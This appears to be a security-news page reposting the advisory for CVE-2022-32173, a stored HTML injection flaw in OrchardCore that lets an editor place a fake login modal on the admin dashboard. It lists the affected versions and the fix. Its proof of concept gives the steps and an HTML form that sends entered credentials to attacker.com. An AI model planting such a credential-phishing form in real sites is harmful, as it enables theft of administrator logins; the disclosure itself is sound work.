Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-32173: Mend Vulnerability Database

In OrchardCore rc1-11259 to v1.2.2 vulnerable to HTML injection, allow an authenticated user with an editor security role to inject a persistent HTML modal dialog component into the dashboard that will affect admin users.

CVE
#vulnerability#auth

Overview

In OrchardCore rc1-11259 to v1.2.2 vulnerable to HTML injection, allow an authenticated user with an editor security role to inject a persistent HTML modal dialog component into the dashboard that will affect admin users.

Details

Once an admin access the dashboard, the injected modal dialog will be presented (preventing access to any other element on the page) and wait for an input, once submitted - the admin will be redirected to a malicious host and the attacker will receive the confidential data (user’s credentials for instance)

PoC Details

1. Log in as an admin, navigate to security roles, and then edit the “Editor” role.
2. Then, enable the “Manage the Admin Dashboard” privilege.
3. Create a user with an “Editor” role and logout.
4. Login with the new user.
5. Once logged in, navigate to the Admin’s page (“/Admin” route).
6. Press on “Manage Dashboard” and edit a certain Widget (with an HTML editing capabilities).
7. Press on “<>” and add the following HTML code (There is a code section)
8. Click on “Publish”.
Yow will see that you are brought into the “/Admin” page, and cannot press on any other element. Type in non-confidential data, and press on “Login”. You will see that you are redirected into the attacker site. Also the credentials are sent to him.
9. Now, let’s login as an admin (since you can’t logout, route to “/login”).
10. Navigate to the Admin’s page (“/Admin” route). You will see the Modal dialog appear.

PoC Code

<div class="modal show d-block">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h3 class="page-title">Please Log In</h3>
</div>
<div class="modal-body">
<form class="new-wiki-page" action="http://attacker.com/">
<div class="form-group">
<label for="username"><span>Username</span></label>
<input type="text" name="username" id="username" class="form-control">
<label for="password"><span>Password</span></label>
<input type="password" name="password" id="password" class="form-control">
</div>
<div class="form-actions"><button name="button" type="submit" class="btn btn-success">Login</button></div>
</form>
</div>
</div>
</div>
</div>

Affected Environments

OrchardCore versions rc1-11259 through v1.2.2

Prevention

Upgrade to OrchardCore version v1.4.0

Related news

GHSA-5gg9-gwj4-mqmj: OrchardCore vulnerable to HTML injection

OrchardCore versions starting with 1.0.0-rc1-11259 and prior to 1.4.0 are vulnerable to HTML injection. The vulnerability allows an authenticated user with an editor security role to inject a persistent HTML modal dialog component into the dashboard that will affect admin users. Version 1.4.0 contains a patch.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907